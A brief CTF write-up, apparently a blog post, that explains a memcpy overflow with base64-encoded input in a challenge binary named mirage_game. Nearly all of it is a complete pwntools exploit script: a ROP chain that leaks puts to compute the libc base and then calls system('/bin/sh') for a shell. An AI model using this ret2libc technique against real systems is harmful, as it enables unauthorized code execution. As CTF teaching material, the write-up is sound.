By
Lometsj
Updated:
Contents
程序是一个简单的memcpy溢出,需要注意一次base64转换,通过puts泄漏地址计算libc_base,构造system(“/bin/sh”)即可
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| from pwn import *
import base64
context.log_level = 'debug'
io = process('./mirage_game')
elf = ELF('./mirage_game')
lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
write_got = elf.got['write']
read_got = elf.got['read']
pre = 'RPCM'
pre += '\x00\x00\x00\x0c'
pre += '\x00\x00\x00\x00'
io.send(pre)
io.recv(12)
payload = 'RPCM'
payload += '\x00\x00\x00\x0c'
payload += '\x00\x00\x00\x42'
fakeebp = 'b' * 8
io.send(payload)
io.recvuntil(':)\n')
payload1 = 'a' * 0x30 + fakeebp
payload1 += p64(0x403383) +p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.symbols['sfadkjf'])
payload1 = base64.b64encode(payload1)
io.sendline(payload1)
r = io.recv()
write_addr = u64(r.split('\n')[1].ljust(8,'\x00'))
print "puts_addr: " + hex(write_addr)
libc_base = write_addr - lib.symbols['puts']
system_addr = libc_base + lib.symbols['system']
payload2 = 'a' * 0x30 + fakeebp
print hex(lib.search('/bin/sh').next())
payload2 += p64(0x403383) + p64(libc_base + lib.search('/bin/sh').next()) + p64(system_addr)
payload2 = base64.b64encode(payload2)
io.sendline(payload2)
io.interactive()
|
